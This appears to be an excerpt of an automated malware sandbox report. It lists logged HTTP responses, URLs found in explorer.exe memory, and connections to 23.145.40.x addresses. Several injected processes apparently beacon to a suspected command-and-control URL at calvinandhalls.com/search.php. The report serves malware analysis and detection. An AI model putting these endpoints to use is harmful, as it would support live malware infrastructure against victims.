Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1726891163.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725351685.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725731451.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1728229982.000000000C99F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1728229982.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723130292.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.000000000358E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.phpx
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/s
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpG
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com:443/search.phpe
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1728229982.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
